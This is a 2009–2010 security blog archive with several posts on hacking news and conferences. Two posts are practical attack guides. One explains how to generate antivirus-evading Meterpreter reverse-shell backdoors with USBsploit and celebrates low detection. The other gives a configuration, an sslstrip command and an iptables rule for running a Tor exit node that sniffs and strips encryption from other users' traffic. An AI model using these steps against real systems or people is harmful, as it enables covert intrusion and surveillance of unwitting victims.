Archive for category hacking
Spreading Ghosts Attacks
Posted by Mourad Ben Lakhoua in Anti-Viruses, Vulnerabilities & attacks, hacking on July 23, 2010
Leonardo Da vinci is widely considered to be one of the greatest painters of all time, and perhaps the most diversely talented person ever to have lived. Leonardo said that there are three types of people that one may encounter: “Those who see. Those who see when they are shown. Those who do not see.”
But here I want to add a class of people who see even if they are prevented – we are talking about the Hacker class.
One of the first things an attacker will do to compromise a remote system is use a Backdoor. I am referring to a ghost – a piece of software that by running it an attacker can have access to a remote system and collect all activities on the targeted machine.
USBsploit is a tool that is still in beta version and has been created by an Infosec researcher and owner of the popular portal Secubs. This tool makes it simple for any person looking to generate Backdoors within a few steps.
First, you need to start with choosing the right distribution, this can be Backtrack/Debian or Ubuntu with the original dependency from Metasploit, than you can follow the clear and easy steps mentioned on the official website.
When you run USBsploit you will find a menu with the list of action you are looking to perform:
1. Create a Backdoor
2. Create a Backdoor and launch a Listener only for the USB Dump attack
3. Launch a Listener for the USB Dump attack from the last Dump configuration file
4. Update the USBsploit Framework
5. Edit the last Dump configuration file (needs vi)
6. Edit the global options (needs vi)
7. Edit the file extensions set to dump (needs vi)
If you choose to create a Backdoor you will be asked to select the IP address of the listener, and by default it will detect local machine IP.
Next you will be asked to select the kind of backdoor you are looking to deploy, depending on victim’s Operating system:
1. Windows Meterpreter Reverse_TCP Spawn a shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64)
3. Windows Meterpreter Egress Buster Spawn a shell and find a port home via multiple ports
And here an important step you will be choosing the kind of encodings to try and bypass weak Antiviruses.
Select one of the below, Backdoored Executable is typically the best.
1. shikata_ga_nai (Very Good)
2. Multi-Encoder (Excellent)
3. Backdoored Executable (BEST)
After encoding you will find the executable file in “/opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe”
This amazing tools helps to create a backdoor that can bypass most popular antiviruses in just a few steps.
My experience was interesting because when testing the generated executable file that had been encoded by msfencode, only 10 out of 42 antiviruses detected it as a Trojan.
You can run the .exe file on a windows machine even if it contains one of the Antiviruses that was not able to detect the malicious code, even with the latest definition such as Kaspersky and activate the listener.
Here you will access all activities on the target machine and have total visibility of the whole system.
make sure you subscribe to my RSS feed!
Black Hat USA 2010
Posted by Mourad Ben Lakhoua in Security events, hacking on July 11, 2010
By the end of this month in Las Vegas there will be the interesting meeting Black Hat USA 2010, where will be presented new vulnerabilities, tools and programs.
BlackHat is the most important and biggest hacking event on the planet, it attracts thousands of experts around the world. This year BlackHat celebrates the 13 Years Anniversary. Among the conferences we can find Cyber War discussion by General Michael V. Hayden, former director of the National Security Agency and Central Intelligence Agency.
There will be about 30 new vulnerabilities, 46 tools and 25 independent researchers will be demonstrating latest cutting-edge Technology.
Widely known speakers will contribute to the event including:
• “Cyber war…Are we at war? And if we are, how should we fight it?” presented by General Michael V. Hayden, former Director, National Security Agency and Central Intelligence Agency
• “Jackpotting Automated Teller Machines Redux” by Barnaby Jack
• “Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios” by Shawn Moyer and Nathan Keltner
• “How to Hack Millions of Routers” by Craig Heffner
• “These Aren’t the Permissions You’re Looking For” by Anthony Lineberry
• “App Attack: Surviving the Mobile Application Explosion” by John Hering and Kevin Mahaffey
• “Hacking and Protecting Oracle Database Vault” by Esteban Martinez Fayo
• “Token Kidnapping’s Revenge” by Cesar Cerrudo
• “HTTPS Can Byte Me, Robert Hansen” by Josh Sokol
• “USB – HID, The Hacking Interface Design” by Richard Rushing.
for More information you can visit the Official website.
make sure you subscribe to my RSS feed!
Sniffing/MITM Attacks on Tor network
Posted by Mourad Ben Lakhoua in Internet, hacking on January 1, 2010
Tor is wonderful tool to ensure your privacy on the Internet ,Tor software is a program that you can run on your computer to helps keep you safe on the Internet.Tor prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. but if you think that this is the only role than you are wrong, since this is just one function of the main purposes of Tor, because another good role of Tor is to create a server and make it available for other users to pass through it.
By installing a sniffer on the server you will be able to see all non encrypted traffic, and you will be able to gather data and sensitive information…
To start you have to get Linux distribution like Backtrack or Ubuntu on a virtual machine it is free and available online. Next download the latest Tor version (currently O.2.1.20). After installing the packages it is better to create a new user on the system trouser: uid=111(toruser) gid=10(wheel) groups=0(wheel),10(wheel). Now Tor use to store the config file .tor in the home directory (/home/toruser) so you need to open this file on the text editor.
In the setting we customize the following:
ControlPort – this is the port used for the remote management of Tor server. Most use the value of 9051.
DirPort – Advertise the directory service on this port. The value is 9030.
ControlPort 9051
DirPort 9030
ExitPolicy – determines what traffic we will receive and forward. By default the policy is as follows:
reject *: 25 , reject *: 119 ,reject * :135-139 , reject *: 445, reject *: 563, reject *: 1214
reject * :4661-4666 ,reject * :6346-6429 ,reject *: 6699 ,reject * :6881-6999 ,accept *: *
here we need to choose the services that we need to receive on our Node and forward (HTTP,HTTPS,POP3,IMAP,IMAPS, POP3S) .so it will be as follows:
ExitPolicy
accept *: 80, accept *: 443, accept *: 110, accept *: 143,accept *: 993, accept *: 995, reject *: *
HashedControlPassword – this to configure the password for remote Tor server configuration and to not allow a malicious user control the server.
Nickname – the server name.
ORPort – port to connect with other nodes 9001.
SocksListenAddress – this will be the localhost (127.0.0.1)
Save the changes and close the file. Now the server is ready to lunch:
$ Tor-f /home/toruser/.tor/torrc
You will take approximately 20 minutes to check the system and ports. Than you can go to http://moria.seul.org:9032/tor/status/authority and you will find our server among other server names.
So Excellent our server is working and it’s time to choose the favorite sniffer Wireshark , Wireshark is already exists in the Backtrack4 select the interface and enable packets capturing. Wireshark will give you all non encrypted traffic like website browsing and other HTTP navigation while it’s in clear. Not bad so far.
Now what about the encrypted traffic, here it’s time to use SSLStrip to get it you go to the official Moxie Marlinspike website and download the last version there is already an update released 2 days ago.
Run the command:
$ Python sslstrip.py-a-l 8080-w today.log
If we are not the last node the traffic will be transmitted in an encrypted form so to decrypt this traffic before it goes to the final destination we need to pass it over the sslstrip by adding this rule to iptable:
$ Iptables-t nat-I OUTPUT-p tcp-m owner-uid-owner 111 – dport 80-j DNAT – to-destination 127.0.0.1:8080
This will make all outdoing HTTP-traffic from user toruser pass through sslstrip automatically, and at this point we need just to wait till that we collect some logs and check the log file.
On next post we will explain the way to perform scanning for Blackbox peneteration testing behind a Tor Proxy.
It is important to note that all programs are used just for educational purposes.
make sure you subscribe to my RSS feed!
Twitter Was Owned.. No it was a Compromised DNS trick!
Posted by Mourad Ben Lakhoua in Internet, News, hacking on December 18, 2009
Today Morning Twitter website was out of service for two hours and the reason of this service disruption is a DNS-attack. Many users thought that the website was compromised by hackers from “Iranian cyber army” by exploiting WordPress vulnerabilities but that was not the case, the attack was made on the DNS server by redirecting users attempting to enter Twitter website to Hackers Website IP address.
The Twitter Team posted the following on their Blog:
As we tweeted a bit ago, Twitter’s DNS records were temporarily compromised tonight but have now been fixed. As some noticed, Twitter.com was redirected for a while but API and platform applications were working. We will update with more information and details once we’ve investigated more fully.
This is not the first DNS attack we read about in the news there were a big number of incidents that are related to the DNS record and it is now very important to start using and implementing the DNSSec to protect the DNS servers.
make sure you subscribe to my RSS feed!
US CERT Warns of PhoneSnoop Attack Against BlackBerry
Posted by Mourad Ben Lakhoua in Tools, Vulnerabilities & attacks, hacking on October 28, 2009
US-CERT Issued a new warning concerning a free application that allows a hacker to spy on phone conversation, the program should be installed on the victim device and after the installation a hacker will be able to listen to all victims call.
This free application called PhoneSnoop and despite the fact that this application provides a similar functionality as FexiSPY, this is the first free program of its kind. Chirashi Zensay the creator of this tool posted on his Blog: “PhoneSnoop demonstrates how a BlackBerry can be used to spy on its owner. While the BlackBerry remains one of the more secure devices out there, user awareness and education is paramount to remaining completely safe from spyware. I tweaked the application since my first post now allowing anyone to download, install and try it. PhoneSnoop now has the ability for a user to customize the ‘trigger number’; rather than me having to give out customized versions.”
This program has been released to demonstrate how it is easy to exploit vulnerability on the BlackBerry devices and currently there is an effort to release new software that can rout SMS over a hacker.
US-CERT currently encourages users to only download BlackBerry applications from trusted sources and to password protect and lock BlackBerry devices.
make sure you subscribe to my RSS feed!
4shared.com Owned!
Posted by Mourad Ben Lakhoua in News, hacking on September 14, 2009
Yesterday it has been reported that 4shared.com was compromised by members of the Anti-sec group. At first many people didn’t believe that the popular file share portal was hacked till that the official sources confirmed the incident.
This attack was made by the end of last week and all users that attempted to visit or check there files on http://www.4shared.com they got another page on it written “I love Morocco” till now there still no details about the attack (if it is DNS poisoning or PHP include…) and what type of vulnerability was exploited.
Maybe this incident brings a big doubt in the security level at the 4shared.com portal even if many users confirmed that everything seems to be there. Any information stored anywhere can be extracted by hackers and there is nothing to prevent us from encrypting our stored information in any desired form. The most important is to be able to decrypt those files 
.
Now the site is working and open to upload your files but do not leave your data unsecure.
make sure you subscribe to my RSS feed!
SecurityTubeCon: first online Hacker Conference
Posted by Mourad Ben Lakhoua in Webcasts, hacking on September 11, 2009
SecurityTubeCon is the name of the first online hacker conference, this event will be held on the 6th, 7th and 8th November and aims to provide researchers a way to share and exchange their thoughts online regardless of their physical location.
Procedure for Speakers selection is unusual because the organizers will not intend to approve or deny participant so it makes all people heard but they will put the talk abstracts online and attendee will choose the presentation they want to join. Well for who are not able to attend the presentation on time all videos will be freely available for download after a week from the conference.
The conference main topics will include:
a. Research Track: Show your bleeding edge research and zero days.
b. Tutorials Track: In-depth Tutorials on security technologies can be given by domain experts
c. Tool Demos: Demonstration of new and cutting edge tools by their original authors
d. Security Product Demos: Demos of state of the art security products by companies and organizations
more information can be found here while Interested Speakers are requested to submit their talk abstracts before the deadline.
make sure you subscribe to my RSS feed!
Astalavista.com Owned!
Posted by Mourad Ben Lakhoua in News, hacking on June 6, 2009
Astalavista website was hacked by hackers referring themselves as anti-sec group.
Astalavista used to be a hacking and security community that started in 1994 and was one of the first search engines for exploit and computer security information. It has provided a board for hacking & security community to share the latest techniques for software cracking, spyware editing, and viruses.
According to anti-sec group they targeted http://astalavista.com to the fact that they are not doing any of this for the “community” but for the money, they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and they charge you $6.66 per months to access a dead forum with a directory filled with public releases and outdated / broken services. We wanted to see how good that “team of security and IT professionals” really is.
And they also shared the shell command to getting into the webserver which you can find on the Zone-h website.
HACKING AT RANDOM 2009
Posted by Mourad Ben Lakhoua in News, hacking on April 10, 2009
Preparations are going well for this year’s European outdoor hacker festival, Hacking At Random, this event will be taking place in The Netherlands August 13-16, 2009. The special discounted rate for people buying tickets early has now been extended to April 14.
The Dutch hacker camps take place every four years. The last one (What The Hack) was held in 2005 and was a great experience overall. Those of you who vowed not to miss the next one should be especially careful not to miss this one.
To subscribe and receive the latest news visit the official website
-
You are currently browsing the archives for the hacking category.
SUBSCRIBE
Latest Comments